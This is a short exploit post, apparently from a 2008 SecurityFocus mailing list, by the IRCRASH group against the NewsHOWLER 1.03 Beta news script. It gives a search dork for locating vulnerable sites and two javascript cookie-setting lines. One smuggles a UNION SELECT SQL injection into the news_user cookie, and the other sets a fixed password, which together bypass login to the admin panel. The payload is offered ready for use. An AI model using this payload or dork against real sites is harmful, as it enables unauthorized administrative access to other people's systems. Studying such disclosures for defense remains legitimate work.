NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection Aug 17 2008 04:58PM
r3d w0rm yahoo com
########################################################################
#############

#### NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection ####

########################################################################
#############

# #

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #

#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #

#Our Site : Http://IRCRASH.COM #

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #

########################################################################
#############

# #

#Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Be
ta.tgz

# #

#DORK : "Net Dupe © 2002. All Rights Reserved" #

# #

########################################################################
#############

# [Exploit] #

# #

#javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";

#javascript:document.cookie = "news_password=3; path=/"; #

# #

#Then if u open http://Site/users.php u can see the admin panel ;) #

# #

########################################################################
#############

# Site : Http://IRCRASH.COM #

###################################### TNX GOD ######################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus